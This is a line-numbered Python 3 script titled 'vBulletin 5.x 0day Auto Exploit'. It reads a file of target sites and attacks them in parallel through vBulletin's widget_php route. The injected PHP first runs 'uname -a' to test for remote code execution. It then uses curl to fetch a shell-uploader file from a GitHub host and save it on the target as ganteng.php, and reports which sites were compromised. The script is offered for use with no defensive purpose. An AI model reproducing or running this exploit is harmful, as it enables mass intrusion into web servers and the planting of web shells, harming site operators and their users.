vBulletin 5.x 0day Auto Exploit [python3]

1. import urllib3, requests, os, sys, re, json
2. from requests.packages.urllib3.exceptions import InsecureRequestWarning
3. import base64
4. import random
5. import string
6. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
7. from multiprocessing.dummy import Pool as ThreadPool
8. from time import time as timer
9. from platform import system
10. from colorama import Fore
11. from colorama import Style
12. from pprint import pprint
13. from colorama import init
14. import urllib
15. from bs4 import BeautifulSoup
16.  
17. fr = Fore.RED
18. fc = Fore.CYAN
19. fw = Fore.WHITE
20. fg = Fore.GREEN
21. sd = Style.DIM
22. sn = Style.NORMAL
23. sb = Style.BRIGHT
24.  
25. params = {"routestring":"ajax/render/widget_php"}
26. params2 = {"routestring":"ajax/render/widget_php"}
27.  
28.  
29. try:
30. os.system('clear')
31. print("""
32. | | | || || || | | || || _ || | | || |
33. | |_| ||____ || ___|| |_| || ___|| |_| || |_| || _____|
34. | | ____| || |___ | _|| | __ | || || |_____
35. | || ______|| ___|| |_ | || || || _ ||_____ |
36. | | | |_____ | |___ | _ || |_| || _ || | | | _____| |
37. |___| |_______||_______||___| |_||_______||__| |__||_| |__||_______|
38.  
39. [ + ] Author : Serizawa
40.  
41. [ + ] Familly Attack Cyber ~ Dann Kowalskyi [ + ]
42. """)
43. ganteng = input('ur files => ')
44. f= open(ganteng, 'r')
45. woh = f.read().splitlines()
46. except IOError:
47. pass
48. woh = list((woh))
49.  
50. def Domains(url):
51.  
52. if '://' not in url:
53. return "http://" + url
54. else:
55. return url
56. def vbulet(site):
57. url = Domains(site)
58.  
59. try:
60. cmd = 'uname -a'
61. params["widgetConfig[code]"] = "echo shell_exec('uname -a'); exit;"
62. params2["widgetConfig[code]"] = "echo shell_exec('curl https://raw.githubusercontent.com/Avinash-acid/Shell-Uploader/master/uploader.php -o ganteng.php'); exit;"
63. r = requests.post(url, data = params, timeout=3).text
64. r2 = requests.post(url, data=params2, timeout=3).text
65. kot = url+'/ganteng.php'
66. bla = requests.get(url+'/ganteng.php').text
67. if 'Linux' in r:
68. print('{}[ {}VULN {}] {}{}' . format(fr,fg,fr,fg,url))
69. print('{} [ {}+ {}] {}[ {}EXPLOITING {}]' .format(fr,fg,fr,fr,fg,fr))
70. if 'Avinash Kumar Thapa' in bla:
71. print(' {}[ {}+ {}] {}[ {}SUCCESS {}] {}{}' . format(fr,fg,fr,fr,fg,fr,fg,kot))
72. else:
73. print(' {}[ {}+ {}] {}[ {}FAILED {}] {}{}' .format (fr,fg,fr,fg,fr,fg,fg,url))
74.  
75. else:
76. print('{}[ {}NOT VULN {}] {}{} ' . format(fg,fr,fg,fg,url))
77. except KeyboardInterrupt:
78. sys.exit("\nClosing shell...")
79. except Exception as e:
80. print('{}[ {}ERROR {}]{}{} --> {}' .format(fg,fr,fg,fg,url,e))
81.  
82. def Run_Work(site):
83. url = Domains(site)
84. vbulet(url)
85.  
86. os.system('clear')
87. def Main():
88.  
89.  
90. start = timer()
91. pp = ThreadPool(40)
92. pr = pp.map(Run_Work, woh)
93. print('Time: ' + str(timer() - start) + ' seconds')
94.  
95.  
96. if __name__ == "__main__":
97. Main()